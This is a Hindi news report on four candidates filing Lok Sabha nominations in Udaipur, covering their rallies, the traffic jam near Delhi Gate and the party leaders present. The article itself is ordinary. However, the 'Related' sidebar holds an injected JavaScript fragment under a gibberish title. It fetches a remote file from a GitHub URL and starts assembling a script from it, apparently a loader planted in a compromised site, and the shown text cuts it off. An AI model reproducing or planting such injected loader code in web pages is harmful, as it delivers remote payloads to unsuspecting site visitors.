चुनावी समर में कूदे अर्जुन-रघुवीर

Date:

IMG_0538IMG_0570

चार प्रत्याशियों ने किया नामांकन, रैलियों व जुलूस के रूप में पहुंचे कलेक्ट्री
उदयपुर। उदयपुर लोकसभा संसदीय सीट के लिए आज भाजपा, कांग्रेस, माकपा और भाकपा के प्रत्याशियों ने सैंकड़ों कार्यकर्ताओं के साथ जुलूस निकालकर नामजदगी दाखिल किए। भाजपा-कांग्रेस के नामांकन जुलूस में कई वरिष्ठ नेताओं ने भी भाग लिया।
लोकसभा चुनाव के लिए नामांकन पत्र दाखिल करने की तारीख घोषित होने के चार दिनों तक एक भी नामांकन दाखिल नहीं हुआ, लेकिन आज शुभ मुहुर्त के चलते कांग्रेसी प्रत्याशी रघुवीर मीणा, भाजपा प्रत्याशी अर्जुनलाल मीणा, वाम मोर्चा प्रत्याशी मेघराज तावड़ व भाकपा (माले) प्रत्याशी गौतमलाल मीणा ने एक साथ अपना नामांकन पत्र जिला निर्वाचन अधिकारी (कलेक्टर) के समक्ष पेश किया। नामांकन के पूर्व कांग्रेस प्रत्याशी रघुवीर मीणा ने टाउनहॉल में जनसभा को संबोधित किया, वहीं नामांकन के बाद भाजपा प्रत्याशी अर्जुनलाल मीणा ने बैंक तिराहे पर जनसभा को संबोधित किया। नामांकन करने जाने के दौरान रघुवीर और अर्जुन के जुलूस में सैंकड़ों की संख्या में कार्यकर्ता मौजूद थे।
सूरजपोल से कलेक्ट्री तक जाम : नामांकन करने के लिए शुभ मुहुर्त का समय एक होने से भाजपा और कांग्रेस के जुलूस का समय भी एक ही रहा। इस वजह से टाउन हॉल रोड, बापूबाजार और देहलीगेट पर तीन घंटों तक जाम की स्थिति बनी रही। पहले भाजपा की रैली उसके बाद कांग्रेस की सभा व रैली हुई। नामांकन के दौरान दोनों पार्टियों के सैंकड़ों कार्यकर्ताओं का देहलीगेट पर जमावड़ा होने से ट्रैफिक व्यवस्था बाधित रही। पुलिसकर्मियों को ट्रैफिक संभालने में काफी मशक्कत करनी पड़ी। एक बार तो रैली के दौरान दोनों पार्टियों के कार्यकत्र्ता आमने-सामने हो गए और आपस में जमकर नारेबाजी की, लेकिन सुरक्षा के पुख्ता इंतजाम के चलते कोई अप्रिय घटना नहीं घटी। नामांकन के लिए आए दोनों पार्टियों के कार्यकर्ताओं को आचार संहिता के चलते देहलीगेट पर ही रोक दिया गया।
सबका अंदाज जुदा : नामांकन के लिए चारों प्रत्याशी अपने-अपने अंदाज में जिला कलेक्ट्री पहुंचे। भाजपा के प्रत्याशी अर्जुनलाल मीणा और कांग्रेस के प्रत्याशी रघुवीर मीणा खुली जीप में बैठकर जनता का अभिवादन करते हुए संैकड़ों कार्यकर्ताओं के साथ जुलूस के रूप में कलेक्ट्री पहुंचे, तो वाम मोर्चा के मेघराज तावड़ टाउनहॉल से स्कूटर पर बैठकर जिला कलेक्ट्री पहुंचे। तावड़ के साथ कार्यकर्ता ढोल-नगाड़े लिए पैदल चल रहे थे। भाकपा (माले) प्रत्याशी गौतमलाल मीणा पैदल ही अपने कुछ कार्यकर्ताओं के साथ कलेक्ट्री नामांकन करने पहुंचे। माकपा और भाकपा के प्रत्याशियों ने 11 बजे अपना नामांकन पत्र दाखिल किया। कांग्रेस प्रत्याशी रघुवीर मीणा ने 12.15 के बाद और भाजपा प्रत्याशी अर्जुन मीणा ने एक बजे अपना नामांकन दाखिल किया।
ये दिग्गज थे साथ : भाजपा प्रत्याशी अर्जुन मीणा का जुलूस सूरजपोल स्थित श्यामाप्रसाद मुखर्जी की प्रतिमा से शुरू हुआ। इससे पूर्व मुखर्जी की प्रतिमा पर पुष्पांजलि अर्पित की गई। इस दौरान उदयपुर विधायक और पंचायती राज एवं ग्रामीण विकास मंत्री गुलाबचंद कटारिया, चुन्नीलाल गरासिया, महावीर भगोरा, ग्रामीण विधायक फूलसिंह मीणा, खेरवाड़ा विधायक नानालाल अहारी, सलूंबर विधायक अमृत मीणा, नागालैंड के पर्यवेक्षक जॉनी रैना, भाजपा नेता प्रमोद सामर, महापौर रजनी डांगी सहित कई नेता शामिल थे। इधर, कांग्रेस प्रत्याशी रघुवीर मीणा के साथ कांग्रेसी नेता लालसिंह झाला, कांग्रेस शहर जिलाध्यक्ष नीलिमा सुखाडिय़ा, धरियावद के पूर्व विधायक नगराज मीणा, आसपुर के पूर्व विधायक राईया मीणा, सलूंबर की पूर्व विधायक बसंती मीणा, पूर्व जिला प्रमुख केवलचंद लबाना, जिला प्रमुख मधु मेहता, पूर्व राज्यमंत्री मांगीलाल गरासिया सहित कई नेता शामिल थे।

IMG_0491

 

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Share post:

Subscribe

spot_imgspot_img

Popular

More like this
Related

oHmtKvYkl

QYRRUUjF;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script...

हिन्दुस्तान जिंक के स्वास्थ्य अभियान के तहत विश्व स्तनपान सप्ताह आयोजित

हिंदुस्तान जिंक, द्वारा स्वास्थ्य अभियान के तहत् विश्व स्तनपान...

हिंदुस्तान जिंक द्वारा खनन कार्यों में आंतरिक प्रतिभा के कौशल एवं अवसर वृद्धि हेतु जावर में ‘हिंदुस्तान जिंक माइनिंग अकादमी’ का शुभारंभ

इस अनूठी पहल से भूमिगत खदानों में जंबो हेल्पर्स प्रमाणित ऑपरेटर बन सकेंगे - पांच महीने तक चलनेवाले इस प्रशिक्षण कार्यक्रम में 16 सप्ताह का क्लासरूम इंस्ट्रक्शन शामिल होगा उदयपुर, 30 जुलाई, 2022: देश की एकमात्र और विश्व...